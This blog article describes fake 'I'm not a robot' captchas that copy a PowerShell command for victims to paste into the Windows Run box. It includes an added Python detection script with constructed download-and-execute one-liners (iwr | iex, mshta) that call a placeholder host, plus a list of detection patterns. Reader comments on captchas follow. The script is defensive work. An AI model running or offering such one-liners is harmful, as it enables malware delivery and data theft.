Captchas can be quite annoying, especially if your input is not accepted or if they do not work at all. You may now add malicious captchas to the list of annoyances.
Proton Mail published one example on X recently.
The malicious captcha tries to convince unsuspecting users to run a command on their Windows machines.
Here is how it works:
- The victim lands on a page with the fake captcha, for instance after clicking on a link in an email or chat.
- The captcha displays the usual “I’m not a robot” button.
- A click or tap on the button copies a PowerShell command to the operating system’s clipboard.
- The victim is instructed to press Windows-R to open the Run box.
- The victim is then asked to press Ctrl-V to paste the command and Enter to execute it.
Doing so downloads malware from a server on the Internet and runs it on the user’s system. The payload may be an infostealer, malicious software that steals personal information such as logins, financial documents, or photos.
While most, if not all, experienced users will never fall for this, it is almost a given that some inexperienced users will. They may struggle to open the Run box or to paste the command, but they probably will not suspect foul play.
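The chain above leaves two traces a defender can look for: a script host (PowerShell, mshta, cmd) started with explorer.exe as its parent, which is what the Run box produces, and an entry in the Run box history. The following is an added detection example, not code from the article or from Proton Mail. It assumes a simplified key=value process-creation log format and Run-history strings shaped like the values Windows keeps under the RunMRU registry key (each ending in "\1"); all sample lines are constructed for the example.

```python
"""Added example: flag process-creation events and Run-box history entries
that match the fake-captcha chain (Win-R, paste, Enter -> script host
downloads and runs a payload). Sample data below is constructed."""
import re

# Constructed sample telemetry in a simplified key=value format (an assumption
# for this example, not the format of any particular product).
SAMPLE_EVENTS = [
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmdline="powershell -w hidden -c iwr http://example.invalid/x | iex"',
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe"',
    'parent=C:\\Program Files\\PowerShell\\7\\pwsh.exe image=C:\\Program Files\\PowerShell\\7\\pwsh.exe '
    'cmdline="pwsh -File build.ps1"',
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\mshta.exe '
    'cmdline="mshta http://example.invalid/verify.hta"',
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmdline="powershell -NoProfile -Command Get-Date"',
]

# Constructed Run-box history, shaped like the per-user RunMRU values
# (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), which end in "\1".
SAMPLE_RUNMRU = [
    'notepad\\1',
    'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/c)"\\1',
    'mspaint\\1',
]

EVENT_RE = re.compile(r'parent=(?P<parent>.+?) image=(?P<image>.+?) cmdline="(?P<cmdline>.*)"')

# Script hosts a pasted one-liner would start; explorer.exe is the Run box's parent.
HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits of a download-and-execute stage: (label, pattern).
INDICATORS = [
    ("remote URL", re.compile(r"https?://", re.I)),
    ("web download cmdlet", re.compile(
        r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("encoded command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("execution policy bypass", re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I)),
]


def basename(path):
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def indicators_in(cmdline):
    """Labels of every indicator pattern found in the command line, in table order."""
    return [label for label, rx in INDICATORS if rx.search(cmdline)]


def parse_event(line):
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"unparsable event: {line!r}")
    return m.groupdict()


def flag_events(lines):
    """Return (cmdline, reasons) for script hosts spawned by explorer.exe
    whose command line carries download-and-execute indicators."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if basename(ev["parent"]) != "explorer.exe" or basename(ev["image"]) not in HOSTS:
            continue
        reasons = indicators_in(ev["cmdline"])
        if reasons:
            hits.append((ev["cmdline"], reasons))
    return hits


def flag_runmru(entries):
    """Return (command, reasons) for Run-box history entries with indicators."""
    hits = []
    for raw in entries:
        cmd = raw[:-2] if raw.endswith("\\1") else raw  # strip the trailing "\1"
        reasons = indicators_in(cmd)
        if reasons:
            hits.append((cmd, reasons))
    return hits


if __name__ == "__main__":
    for cmd, why in flag_events(SAMPLE_EVENTS):
        print("process:", cmd, "->", ", ".join(why))
    for cmd, why in flag_runmru(SAMPLE_RUNMRU):
        print("run history:", cmd, "->", ", ".join(why))
```

The parent-process condition is what separates this from ordinary PowerShell use: an administrator's script started from a console or scheduler has a different parent, whereas a command typed into the Run box is always launched by explorer.exe. The indicator list is deliberately short and should be tuned against local baseline activity before alerting on it.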
How to protect yourself
Protection is quite easy.
No legitimate captcha will ever ask you to execute a command on a local system, or to download a file and run it.
That is pretty much all that you need to protect yourself and your data against this type of attack.
Clearly, you may also want to ask yourself whether you trust the site you are on. Even if you conclude that you do, you should not run anything on the local computer when prompted to do so by a captcha.
Now You: how do you handle captchas on the Internet?
I boycott any Website requiring a Captcha which requires user input.
I accept Captchas of the sort ‘Verify you are human’ because it only requires a click.
Google Captchas are always blocked in conformity with my policy regarding Google.
Cloudflare Challenge Captchas are accepted given I’ve never encountered any requiring more than a user click. The only bother is when you wipe out site cookies on exiting the site, as I do, given that most Captchas, if not all, set a session-only cookie which may be valid for an idiotic 10 minutes (yep, as with Kagi Translate without an account) up to the whole session.
Regarding these new malicious Captchas, great that you point this out, Martin, as well as stating that “No legitimate captcha will ever ask you to execute a command on a local system, or to download a file and run it.”
I’m the same on all points Tom, I block all Google Captchas since I’m already blocking everything from Google, and anything else that requires more than a click is not worth the bother. I also delete cookies when exiting sites. These new malicious Captchas sound weird – why would I ever run a command on my computer to look at a website? But, I guess some users are uninformed enough to do just about anything.
For the sake of truth I have to update my above comment. Update, not rectify:
“(…) most Captchas if not all set a session-only cookie which may be valid for an idiotic 10 minutes (Yep, as with Kagi Translate without an account) up to the whole session.”
Kagi Translate now sets the Cloudflare Challenge Captcha validity for the whole session. Previously it’d be only for 10 minutes and, even worse, the Captcha would reload as soon as the user moved to another tab (I had to include the site in a ‘Disable Page Visibility API’ userscript I use on specific sites). The change conforms to sanity.